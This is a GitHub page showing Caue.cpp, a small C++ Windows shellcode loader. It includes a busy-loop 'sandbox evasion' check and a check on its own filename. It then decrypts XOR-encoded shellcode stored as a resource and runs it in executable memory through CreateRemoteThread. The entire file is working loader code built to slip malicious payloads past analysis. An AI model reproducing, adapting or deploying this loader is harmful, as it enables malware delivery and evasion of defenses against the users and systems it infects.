-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathCaue.cpp
81 lines (64 loc) · 2.32 KB
/
Caue.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
// Compile: clang++.exe -O2 -Ob2 -Os -fno-stack-protector -g -Xlinker -pdb:none -Xlinker -subsystem:windows -o Caue.exe Caue.cpp metadata.res -luser32 -lkernel32 -fno-unroll-loops -fno-exceptions -fno-rtti
#include <windows.h>
#include <stdio.h>
#include <iostream>
#include <string>
#include <regex>
#define SHELLCODE_RESOURCE 101
#define MAX_OP 89888996
void shellcode();
using namespace std;
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
// Simple sanbox evasion
char path[MAX_PATH];
int cpt = 0;
int i = 0;
for (i = 0; i < MAX_OP; i++)
{
cpt++;
}
if (cpt == MAX_OP)
{
GetModuleFileName(NULL, path, MAX_PATH);
regex str_expr("(.*)(Caue)(.*)");
// Check if the file path matches the regular expression pattern
if (regex_match(path, str_expr))
{
shellcode();
}
}
return 0;
}
void shellcode() {
// Load shellcode from resources
HRSRC shellcodeResource = FindResource(NULL, MAKEINTRESOURCE(SHELLCODE_RESOURCE), RT_RCDATA);
HGLOBAL shellcodeResourceData = LoadResource(NULL, shellcodeResource);
DWORD shellcodeSize = SizeofResource(NULL, shellcodeResource);
// Copy the shellcode to a modifiable buffer
char* dataCopy = new char[shellcodeSize];
memcpy(dataCopy, LockResource(shellcodeResourceData), shellcodeSize);
// XOR Decrypt the shellcode
char key[] = "ABCD";
int j = 0;
for (int i = 0; i < shellcodeSize; i++)
{
if (j == sizeof(key) - 1) j = 0;
dataCopy[i] = dataCopy[i] ^ key[j];
j++;
}
// Get the ID of the current process
DWORD pnameid = GetCurrentProcessId();
// Open the current process with all access rights
HANDLE processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pnameid);
// Allocate memory the size of the shellcode
PVOID remoteBuffer = VirtualAllocEx(processHandle, NULL, shellcodeSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
// Write the shellcode to the remote buffer
WriteProcessMemory(processHandle, remoteBuffer, dataCopy, shellcodeSize, NULL);
// Create a remote thread
HANDLE remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
// Cleanup
CloseHandle(processHandle);
delete[] dataCopy;
WaitForSingleObject(remoteThread, INFINITE);
}